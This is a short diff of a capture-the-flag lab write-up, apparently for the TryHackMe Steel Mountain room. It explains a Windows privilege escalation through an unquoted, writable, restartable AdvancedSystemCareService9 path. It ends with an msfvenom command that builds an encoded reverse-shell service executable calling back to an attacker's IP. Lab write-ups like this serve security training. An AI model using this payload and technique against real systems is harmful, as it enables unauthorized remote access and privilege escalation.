tymyrddin/red-escalation/source/docs/thm/steel-mountain.md

 CanRestart     : True
 ```

+`AdvancedSystemCareService9` has an unquoted service path vulnerability, the directory to the application is
+writeable, AND it has the `CanRestart` option `True`.
 The legitimate application can be replaced with another one.

-Create payload:
+Create payload on the attack machine:

 ```text
 # msfvenom -p windows/shell_reverse_tcp LHOST=<IP address attack machine> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe